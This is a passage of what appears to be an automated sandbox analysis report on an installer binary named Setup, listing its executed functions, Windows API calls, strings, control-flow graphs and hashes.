6c4b20f9 6 API calls 85625->85638 85628 6c4b21b8 InterlockedPopEntrySList 85626->85628 85629 6c4b21a1 GetProcessHeap HeapAlloc 85626->85629 85632 6c4b21c5 VirtualAlloc 85628->85632 85637 6c4b21dc 85628->85637 85631 6c4b21b6 85629->85631 85629->85637 85630 6c4b2193 85630->85626 85630->85637 85631->85637 85633 6c4b21e0 InterlockedPopEntrySList 85632->85633 85632->85637 85634 6c4b2202 85633->85634 85635 6c4b21f0 VirtualFree 85633->85635 85636 6c4b2208 InterlockedPushEntrySList 85634->85636 85635->85637 85636->85636 85636->85637 85638->85630

                                                              Executed Functions

                                                              Function 6C4A6525 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 199comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3_catch.LIBCMT ref: 6C4A652C
                                                                • Part of subcall function 6C49E8E8: __EH_prolog3.LIBCMT ref: 6C49E8EF
                                                                • Part of subcall function 6C49E93B: __EH_prolog3.LIBCMT ref: 6C49E942
                                                              • CoInitialize.OLE32(00000000), ref: 6C4A6596
                                                                • Part of subcall function 6C4A697A: __EH_prolog3.LIBCMT ref: 6C4A6981
                                                                • Part of subcall function 6C4A697A: CoCreateInstance.OLE32(6C487980,00000000,00000017,6C487970,?,?,00000068,6C4A65A6,?,?,?,?,6C4A2A30,?,00000000,?), ref: 6C4A69AC
                                                              • CoCreateInstance.OLE32(6C487930,00000000,00000017,6C487970,00000001,?,?,?,?,6C4A2A30,?,00000000,?,00000000,00000000,?), ref: 6C4A65BE
                                                              • CoUninitialize.OLE32(00000001,?,00000000,00000000,?,?,succeeded,?,?,?,6C4A2A30,?,00000000,?,00000000,00000000), ref: 6C4A66DE
                                                              • __CxxThrowException@8.LIBCMT ref: 6C4A6773
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$CreateInstance$Exception@8H_prolog3_catchInitializeThrowUninitialize
                                                              • String ID: exiting function/method$Entering Function$IronMan::UiDataT<class IronMan::CCmdLineSwitches>::CreateUiDataT$UIInfo.xml$Xml Document load failure$succeeded$threw exception
                                                              • API String ID: 4239111664-3845428783
                                                              • Opcode ID: 35ae017666f58d2c700bd049e1dc80175592b0c380a7a557c8d8cf133575ae7f
                                                              • Instruction ID: 2286dd2adc037507fd87bd9a26e3cc70cf17123fd9552721d2d1b713f6398889
                                                              • Opcode Fuzzy Hash: 35ae017666f58d2c700bd049e1dc80175592b0c380a7a557c8d8cf133575ae7f
                                                              • Instruction Fuzzy Hash: F0814971901248EFDB00DFE8C888EDEBBB8AF19318F148559E514EB755CB35DA46CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C9476A7 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 99libraryloaderthreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C9476AE
                                                                • Part of subcall function 6C96C0AA: _malloc.LIBCMT ref: 6C96C0C4
                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,00000020,6C94F845,?), ref: 6C947748
                                                              • GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 6C947758
                                                              • SetThreadStackGuarantee.KERNEL32(00020000), ref: 6C94776D
                                                              • SetUnhandledExceptionFilter.KERNEL32(6C95416A), ref: 6C947774
                                                              • GetCommandLineW.KERNEL32 ref: 6C94777A
                                                                • Part of subcall function 6C917C6E: __EH_prolog3.LIBCMT ref: 6C917C75
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$AddressCommandExceptionFilterGuaranteeHandleLineModuleProcStackThreadUnhandled_malloc
                                                              • String ID: SetThreadStackGuarantee$kernel32.dll$passive
                                                              • API String ID: 4088884676-825548933
                                                              • Opcode ID: dc7f2e178b8cd67aa3664308c5c9969b2e79fa274f34490af27e24124e16a183
                                                              • Instruction ID: 212dc8d68e0e2a34b17f1c48e4ea1745c153af80ae483bdc6b9d1d6c297bc486
                                                              • Opcode Fuzzy Hash: dc7f2e178b8cd67aa3664308c5c9969b2e79fa274f34490af27e24124e16a183
                                                              • Instruction Fuzzy Hash: D0418EB19053848EDB10CFA9C584699BBF4BF25708F60886ED05997F41C730D649CB65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C925B82 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 93fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 6C925B8C
                                                              • _memset.LIBCMT ref: 6C925BBB
                                                                • Part of subcall function 6C948E4A: PathAppendW.SHLWAPI(00000000,?,?,?,?,?,6C9599FD,00000000,00000000,?,?,?,00000000,?,UiInfo.xml), ref: 6C948E6E
                                                              • FindFirstFileW.KERNEL32(?,?,????), ref: 6C925BDA
                                                              • FindNextFileW.KERNELBASE(?,?), ref: 6C925CA8
                                                              • FindClose.KERNEL32(?), ref: 6C925CC1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Find$File$AppendCloseFirstH_prolog3_NextPath_memset
                                                              • String ID: ????
                                                              • API String ID: 2365859831-1216582215
                                                              • Opcode ID: 9fcdfd55eb312599cf725ac58ea78a5068cdc4e67a1479d745662c6283645032
                                                              • Instruction ID: 41e9108ed2d13e359bb2d9df9c81eec3201c4bc1232d4d6746304c3f1d9a514a
                                                              • Opcode Fuzzy Hash: 9fcdfd55eb312599cf725ac58ea78a5068cdc4e67a1479d745662c6283645032
                                                              • Instruction Fuzzy Hash: 1431C6718052199ADF20EF65CC8CBEE73B8AF21359F104696F444D6A94EB39CAC8CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C48EFE2 Relevance: 7.5, APIs: 5, Instructions: 49processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6C48EFFE
                                                              • _memset.LIBCMT ref: 6C48F018
                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 6C48F032
                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 6C48F04D
                                                              • FindCloseChangeNotification.KERNEL32(00000000), ref: 6C48F061
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32_memset
                                                              • String ID:
                                                              • API String ID: 949835396-0
                                                              • Opcode ID: 5fd2b166bb75b91007f77d6e978f388552bd50403fa0dfceab18bb8c12cec6c6
                                                              • Instruction ID: c1c262f894fdad4e01bbb6795e27cec53adea632ca6edb65a5111f249e02086e
                                                              • Opcode Fuzzy Hash: 5fd2b166bb75b91007f77d6e978f388552bd50403fa0dfceab18bb8c12cec6c6
                                                              • Instruction Fuzzy Hash: B0019675A03118AFD710EBA5DC4CEAE77B8EB47315F50015AE814D3680D774DE46CAA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C49CBE6 Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Item$MessageSend$CallbackDispatcherParentTextUserWindow
                                                              • String ID:
                                                              • API String ID: 2000255171-0
                                                              • Opcode ID: 4aec542958c1ba33b69a734db882570818681acd101a96f53df1ca3f69928531
                                                              • Instruction ID: e3de960906fa3bd1b1d5dc362ea204f09f01ec959ac1123262f1880039accafe
                                                              • Opcode Fuzzy Hash: 4aec542958c1ba33b69a734db882570818681acd101a96f53df1ca3f69928531
                                                              • Instruction Fuzzy Hash: DEC1AF7160422A9FDB14EF68C580F9EBFB4FB08308F50461AE96697690D770E962CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C95B390 Relevance: 50.5, APIs: 12, Strings: 16, Instructions: 1496threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 6c95b390-6c95b4a9 call 6c976e52 call 6c95d446 call 6c95d713 call 6c94833e call 6c95988c call 6c944e70 call 6c968f0e call 6c94833e call 6c95988c call 6c968eab call 6c91a8cc call 6c94833e call 6c945033 call 6c968f0e call 6c9451c0 SysFreeString call 6c968f0e call 6c95d01e call 6c9259b8 call 6c926083 39 6c95b514-6c95b54d call 6c925e2b GetCommandLineW call 6c913e77 call 6c959293 0->39 40 6c95b4ab-6c95b50f call 6c94833e * 2 call 6c91838a call 6c968f0e * 2 call 6c91a378 call 6c9714aa 0->40 54 6c95b555-6c95b5ac call 6c94833e call 6c95988c call 6c934718 call 6c968f0e call 6c94833e 39->54 55 6c95b54f 39->55 40->39 72 6c95b5b4-6c95b614 call 6c9484b9 call 6c968f0e * 2 54->72 73 6c95b5ae 54->73 55->54 81 6c95b616-6c95b620 call 6c934a3f 72->81 82 6c95b630-6c95b75a call 6c932d50 call 6c932d73 call 6c913a16 GetThreadLocale call 6c9141d6 call 6c947889 call 6c947db0 call 6c947c9e call 6c947e78 call 6c9143c4 call 6c915e41 72->82 73->72 85 6c95b625-6c95b627 81->85 106 6c95b75c-6c95b762 82->106 107 6c95b768-6c95b785 call 6c948f73 82->107 85->82 87 6c95b629 85->87 87->82 106->107 108 6c95b883-6c95b887 106->108 119 6c95b787-6c95b7a6 call 6c968eab 107->119 120 6c95b7a8-6c95b7c2 call 6c94833e 107->120 110 6c95b893-6c95b89c call 6c9453e5 108->110 111 6c95b889-6c95b88d 108->111 117 6c95b8a1-6c95b8a3 110->117 111->110 113 6c95b956-6c95b9a8 call 6c946dcb call 6c932d2f call 6c914272 111->113 136 6c95b9c3-6c95b9c5 113->136 137 6c95b9aa-6c95b9b8 call 6c9142b6 113->137 117->113 121 6c95b8a9-6c95b953 call 6c95cb31 call 6c94833e call 6c95ce5c call 6c968f0e * 2 call 6c945a5a call 6c9343ed call 6c9141a9 call 6c925b32 call 6c95d6d1 call 6c976f06 117->121 130 6c95b7c9-6c95b7f7 call 6c932d50 call 6c9475b5 call 6c968f0e 119->130 120->130 156 6c95b7f9-6c95b806 call 6c968f0e 130->156 157 6c95b80b-6c95b813 130->157 143 6c95b9c6-6c95ba05 call 6c936e46 call 6c968f0e call 6c49e1ad 136->143 137->136 150 6c95b9ba-6c95b9bd 137->150 167 6c95ba07-6c95ba27 call 6c95cb31 143->167 168 6c95ba7c-6c95bab6 call 6c932d50 call 6c968f0e 143->168 150->136 155 6c95b9bf-6c95b9c1 150->155 155->143 156->157 162 6c95b815-6c95b81b call 6c968f0e 157->162 163 6c95b820-6c95b84b call 6c948e8b 157->163 162->163 184 6c95b850-6c95b852 163->184 179 6c95ba2c-6c95ba75 call 6c94833e call 6c95ce5c call 6c936f61 call 6c94be94 call 6c968f0e * 2 167->179 196 6c95bae1-6c95bb00 call 6c91be2b 168->196 197 6c95bab8-6c95badc call 6c95cb31 168->197 179->168 187 6c95b854-6c95b859 call 6c947a1c 184->187 188 6c95b85e-6c95b87e call 6c968f0e * 3 184->188 187->188 188->108 210 6c95bb06-6c95bb0d 196->210 211 6c95bbd0-6c95bc04 call 6c932d50 call 6c968f0e 196->211 197->179 210->211 215 6c95bb13-6c95bb1d call 6c96c0aa 210->215 228 6c95bb2c-6c95bb74 call 6c932d50 call 6c95cec8 call 6c968f0e 211->228 231 6c95bc0a-6c95bc48 call 6c95cb31 call 6c94833e call 6c95ce5c 211->231 224 6c95bb23-6c95bb29 215->224 225 6c95bbc8-6c95bbcb 215->225 224->228 225->228 242 6c95bc5b-6c95bc68 call 6c914272 228->242 243 6c95bb7a-6c95bbc0 call 6c936f61 call 6c94be94 call 6c968f0e * 2 228->243 248 6c95bc4b-6c95bc56 231->248 249 6c95bc7f-6c95bccc call 6c95cb31 call 6c94833e call 6c95ce5c 242->249 250 6c95bc6a-6c95bc78 call 6c9142b6 242->250 243->225 248->242 275 6c95bcce-6c95bcda 249->275 250->249 259 6c95bc7a-6c95bc7d 250->259 259->249 261 6c95bcdf-6c95bd02 call 6c94833e call 6c914552 259->261 276 6c95bd04-6c95bd6d call 6c95cb31 call 6c94833e call 6c95ce5c call 6c968f0e 261->276 277 6c95bd72-6c95bdcb call 6c932d50 call 6c94586d call 6c968f0e call 6c94594b 261->277 275->248 276->275 295 6c95bdd1-6c95bdd6 277->295 296 6c95beed-6c95bf26 call 6c932d50 call 6c49e4b7 call 6c968f0e 277->296 299 6c95be8d-6c95bee8 call 6c95cb31 call 6c94833e call 6c95ce5c CloseHandle call 6c968f0e 295->299 300 6c95bddc-6c95be85 call 6c94833e call 6c94ae4a call 6c91420c call 6c947a92 CloseHandle call 6c968f0e * 2 call 6c936f61 call 6c94be94 call 6c968f0e * 2 295->300 318 6c95bf28-6c95bf91 CloseHandle call 6c968f0e * 2 call 6c936f61 call 6c94be94 call 6c968f0e * 2 296->318 319 6c95bf9b-6c95c011 call 6c932d50 call 6c938fce call 6c914486 call 6c968f0e 296->319 299->296 300->299 318->319 345 6c95c017-6c95c01b 319->345 346 6c95c100-6c95c16c call 6c914486 call 6c94833e call 6c968f0e 319->346 348 6c95c023-6c95c030 call 6c91420c 345->348 349 6c95c01d-6c95c021 345->349 387 6c95c16e-6c95c178 call 6c968d3a 346->387 388 6c95c17b-6c95c233 GetTempPathW call 6c968afc call 6c932d73 call 6c932d50 call 6c948c7a call 6c948c24 call 6c94ff21 call 6c968f0e * 4 CreateDirectoryW 346->388 348->346 354 6c95c036-6c95c03d call 6c939048 348->354 349->348 349->354 365 6c95c042-6c95c04c 354->365 375 6c95c053-6c95c060 365->375 376 6c95c04e-6c95c051 365->376 377 6c95c0a4-6c95c0e5 call 6c91420c call 6c947a92 call 6c968f0e 375->377 383 6c95c062-6c95c06b 375->383 376->377 395 6c95c0ea-6c95c0f3 377->395 394 6c95c06d-6c95c089 call 6c94833e call 6c94b057 383->394 383->395 387->388 427 6c95c235-6c95c240 GetLastError 388->427 428 6c95c25c-6c95c275 call 6c94833e call 6c9484b9 388->428 410 6c95c08e-6c95c09d call 6c968f0e 394->410 395->346 406 6c95c0f5-6c95c0fb call 6c95d713 395->406 406->346 410->377 427->428 429 6c95c242-6c95c25a call 6c915d3f call 6c9484b9 427->429 438 6c95c278-6c95c3ec call 6c968f0e * 2 call 6c95d779 call 6c95e449 call 6c9159a2 call 6c941494 call 6c915d3f call 6c968eab call 6c914486 428->438 429->438 458 6c95c3f4-6c95c4e1 call 6c9159a2 call 6c968f0e call 6c914460 call 6c9376bb call 6c968f0e call 6c914460 call 6c9376bb call 6c968f0e call 6c914460 call 6c968f0e 438->458 459 6c95c3ee 438->459 480 6c95c4f5-6c95c52f call 6c937053 458->480 481 6c95c4e3-6c95c4f2 458->481 459->458 485 6c95c535-6c95c622 call 6c95cb31 call 6c94833e call 6c95ce5c call 6c937148 call 6c937773 * 2 call 6c937292 call 6c968f0e * 2 call 6c937292 call 6c95e49e call 6c95d985 call 6c968f0e * 2 480->485 486 6c95c627-6c95c6a5 480->486 481->480 485->486 508 6c95c6a7-6c95c6c0 486->508 509 6c95c6cc-6c95c6e8 call 6c91420c 486->509 508->509 515 6c95c6c2-6c95c6c9 508->515 520 6c95c713-6c95c740 call 6c947a92 call 6c932d50 509->520 521 6c95c6ea-6c95c6f8 509->521 515->509 535 6c95c755-6c95c8ec call 6c968f0e call 6c937148 call 6c937773 * 2 call 6c937292 call 6c968f0e * 2 call 6c937292 call 6c95e49e call 6c95d985 call 6c968f0e * 3 CloseHandle call 6c968f0e * 2 call 6c936f61 call 6c94be94 call 6c968f0e * 2 call 6c945a5a call 6c9343ed call 6c9141a9 call 6c925b32 call 6c95d6d1 520->535 536 6c95c742-6c95c750 call 6c9663d7 520->536 524 6c95c6ff-6c95c70d 521->524 525 6c95c6fa-6c95c6fd 521->525 524->520 525->520 525->524 536->535
                                                              APIs
                                                              • __EH_prolog3_catch.LIBCMT ref: 6C95B39A
                                                                • Part of subcall function 6C95D446: __EH_prolog3_catch.LIBCMT ref: 6C95D44D
                                                                • Part of subcall function 6C95D446: GetCommandLineW.KERNEL32(0000006C,6C95B3B6,?,00000738,6C94FA6E,?,6C90A794,02642228), ref: 6C95D48E
                                                                • Part of subcall function 6C95D446: CoInitialize.OLE32(00000000), ref: 6C95D4EF
                                                                • Part of subcall function 6C95D713: CreateThread.KERNEL32(00000000,00000000,6C9623E8,?,00000000,00000000), ref: 6C95D729
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C95988C: __EH_prolog3.LIBCMT ref: 6C959893
                                                                • Part of subcall function 6C95988C: GetCommandLineW.KERNEL32(0000002C,6C95D52A,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C9598B4
                                                                • Part of subcall function 6C95988C: PathIsRelativeW.SHLWAPI(?,?,?,00000000,?,UiInfo.xml,?,?,00000000,?), ref: 6C95996E
                                                                • Part of subcall function 6C944E70: __EH_prolog3.LIBCMT ref: 6C944E77
                                                                • Part of subcall function 6C944E70: __CxxThrowException@8.LIBCMT ref: 6C944F68
                                                                • Part of subcall function 6C944E70: ReadFile.KERNEL32(?,?,00000002,?,00000000,?,80000000,00000001,00000003,00000080,00000000,?,?,?,?,0000002C), ref: 6C944F7E
                                                                • Part of subcall function 6C944E70: FindCloseChangeNotification.KERNEL32(?), ref: 6C944FA1
                                                                • Part of subcall function 6C91A8CC: __EH_prolog3.LIBCMT ref: 6C91A8D3
                                                                • Part of subcall function 6C91A8CC: PathIsRelativeW.SHLWAPI(00000000,00000000,?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C91A90B
                                                                • Part of subcall function 6C91A8CC: GetModuleFileNameW.KERNEL32(00000010,00000104,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C91A964
                                                                • Part of subcall function 6C91A8CC: __CxxThrowException@8.LIBCMT ref: 6C91AA28
                                                                • Part of subcall function 6C945033: __EH_prolog3.LIBCMT ref: 6C94503A
                                                                • Part of subcall function 6C945033: __CxxThrowException@8.LIBCMT ref: 6C9450B6
                                                                • Part of subcall function 6C9451C0: __EH_prolog3_catch.LIBCMT ref: 6C9451C7
                                                                • Part of subcall function 6C9451C0: CoInitialize.OLE32(00000000), ref: 6C9451DC
                                                              • SysFreeString.OLEAUT32(?), ref: 6C95B471
                                                                • Part of subcall function 6C95D01E: __EH_prolog3.LIBCMT ref: 6C95D025
                                                                • Part of subcall function 6C95D01E: PathFileExistsW.SHLWAPI(?,6C9061FC,graphics,?,00000054,6C95B48A,?,?,?,?,ParameterInfo.xml,?,00000000,?,?,ParameterInfo.xml), ref: 6C95D0BE
                                                                • Part of subcall function 6C9259B8: __EH_prolog3.LIBCMT ref: 6C9259BF
                                                                • Part of subcall function 6C926083: __EH_prolog3_catch.LIBCMT ref: 6C92608A
                                                              • GetCommandLineW.KERNEL32(?,?,?,?,?,ParameterInfo.xml,?,00000000,?,?,ParameterInfo.xml,?,?,00000738,6C94FA6E,?), ref: 6C95B51F
                                                                • Part of subcall function 6C91838A: __EH_prolog3.LIBCMT ref: 6C918391
                                                                • Part of subcall function 6C91A378: __EH_prolog3.LIBCMT ref: 6C91A37F
                                                              • __CxxThrowException@8.LIBCMT ref: 6C95B50F
                                                                • Part of subcall function 6C9714AA: KiUserExceptionDispatcher.NTDLL(?,?,6C96C129,00000C00,?,?,?,?,6C96C129,00000C00,6C98BA3C,6C9A76D4,00000C00,00000020,6C94F845,?), ref: 6C9714EC
                                                                • Part of subcall function 6C913A16: __EH_prolog3.LIBCMT ref: 6C913A1D
                                                              • GetThreadLocale.KERNEL32(?,passive,00000000), ref: 6C95B6C8
                                                                • Part of subcall function 6C947889: __EH_prolog3.LIBCMT ref: 6C947890
                                                                • Part of subcall function 6C947DB0: __EH_prolog3.LIBCMT ref: 6C947DB7
                                                                • Part of subcall function 6C947C9E: __EH_prolog3.LIBCMT ref: 6C947CA5
                                                                • Part of subcall function 6C947E78: __EH_prolog3.LIBCMT ref: 6C947E7F
                                                                • Part of subcall function 6C9143C4: __EH_prolog3.LIBCMT ref: 6C9143CB
                                                                • Part of subcall function 6C915E41: __EH_prolog3.LIBCMT ref: 6C915E48
                                                                • Part of subcall function 6C915E41: PathFindFileNameW.SHLWAPI(?,?,?,0000000C,6C915E13,?,6C94831D,?,0000000C,6C917D3D,?,00000000,?,?,6C90AB18,00000008), ref: 6C915E83
                                                                • Part of subcall function 6C915E41: PathFindExtensionW.SHLWAPI(?), ref: 6C915EA0
                                                                • Part of subcall function 6C946DCB: GetCommandLineW.KERNEL32(512AC3CC,?,?,00000000,?,?,?,?,?,ParameterInfo.xml,?,?,?,00000000,?,?), ref: 6C946E16
                                                                • Part of subcall function 6C94594B: __EH_prolog3.LIBCMT ref: 6C945952
                                                              • CloseHandle.KERNEL32(?,?,?,?,OneInstance,?,00000000,?,ParameterInfo.xml,?,?,00000738,6C94FA6E,?,6C90A794,02642228), ref: 6C95BED4
                                                                • Part of subcall function 6C94AE4A: __EH_prolog3.LIBCMT ref: 6C94AE51
                                                              • CloseHandle.KERNEL32(?,?,00000000,?,00000001,00000007,?,OneInstance,?,?,00000000,?,?,?,?,?), ref: 6C95BE22
                                                                • Part of subcall function 6C936F61: __EH_prolog3.LIBCMT ref: 6C936F68
                                                                • Part of subcall function 6C94BE94: _free.LIBCMT ref: 6C94BEBC
                                                                • Part of subcall function 6C94BE94: _free.LIBCMT ref: 6C94BECD
                                                              • CloseHandle.KERNEL32(?), ref: 6C95BF2E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Path$CloseCommandException@8FileH_prolog3_catchLineThrow$FindHandle$InitializeNameRelativeThread_free$ChangeCreateDispatcherExceptionExistsExtensionFreeLocaleModuleNotificationReadStringUser
                                                              • String ID: !$#(loc.ids_wer_message)$%TEMP%\$Blocker$Command-line option error: $CreateFilesInUser$CreateHelpUsage$CreateUiMode$FactoryInitialization$InvalidArguments$OneInstance$PISemanticChecker$ParameterInfo.xml$Parameterinfo.xml or UiInfo.xml has a #Loc that is not defined in LocalizeData.xml $W$passive
                                                              • API String ID: 1658402695-280204926
                                                              • Opcode ID: f437b631f61fa9a68e5a6b320e72f3acdbcd6c9934e36346aab555358f82a4d2
                                                              • Instruction ID: a11712d8f9e37bc0f5098c730468d7cd2ef87fd43cb66d818dbff6d304afcfbc
                                                              • Opcode Fuzzy Hash: f437b631f61fa9a68e5a6b320e72f3acdbcd6c9934e36346aab555358f82a4d2
                                                              • Instruction Fuzzy Hash: 46E25B71D00258DFDF11DBA8C944ADDBBB8AF29318F148199E418B7B91CB34DA49CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C4A697A Relevance: 47.7, APIs: 16, Strings: 11, Instructions: 457comCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 595 6c4a697a-6c4a69b6 call 6c4b265b call 6c491e75 CoCreateInstance 600 6c4a69b8-6c4a6a10 call 6c48c98c call 6c48b93e call 6c4a8460 call 6c48b93e 595->600 601 6c4a6a36-6c4a6a87 call 6c49e8e8 call 6c4a50fb PathIsRelativeW 595->601 615 6c4a6a18-6c4a6a33 call 6c4a8460 * 2 call 6c4b2709 600->615 616 6c4a6a12-6c4a6a14 600->616 621 6c4a6a89-6c4a6a92 PathFileExistsW 601->621 622 6c4a6a94-6c4a6ac5 call 6c4a83fd call 6c49f21d PathFileExistsW * 2 601->622 616->615 624 6c4a6ade-6c4a6b23 call 6c4a7cdc call 6c48b93e 621->624 635 6c4a6ad2-6c4a6ad9 call 6c4a8460 622->635 636 6c4a6ac7-6c4a6acd call 6c49ea8d 622->636 641 6c4a6b29-6c4a6b2e 624->641 642 6c4a6df0-6c4a6ed5 call 6c49e8e8 * 2 call 6c4a80ba call 6c4a8460 * 2 call 6c49e8e8 624->642 635->624 636->635 641->642 643 6c4a6b34-6c4a6b56 CoCreateInstance 641->643 645 6c4a6b58-6c4a6bb1 call 6c48c98c call 6c48b93e call 6c4a8460 call 6c48b93e 643->645 646 6c4a6bd3-6c4a6bf0 call 6c49e8e8 PathIsRelativeW 643->646 675 6c4a6bb9-6c4a6bce VariantClear call 6c4a8460 645->675 676 6c4a6bb3-6c4a6bb5 645->676 652 6c4a6bfd-6c4a6c2e call 6c4a83fd call 6c49f21d PathFileExistsW * 2 646->652 653 6c4a6bf2-6c4a6bfb PathFileExistsW 646->653 670 6c4a6c3b-6c4a6c42 call 6c4a8460 652->670 671 6c4a6c30-6c4a6c36 call 6c49ea8d 652->671 656 6c4a6c47-6c4a6c96 call 6c48b93e call 6c4a7cdc VariantClear 653->656 681 6c4a6c98-6c4a6cab call 6c4adbdb 656->681 682 6c4a6cb0-6c4a6cbf 656->682 670->656 671->670 675->646 676->675 681->682 686 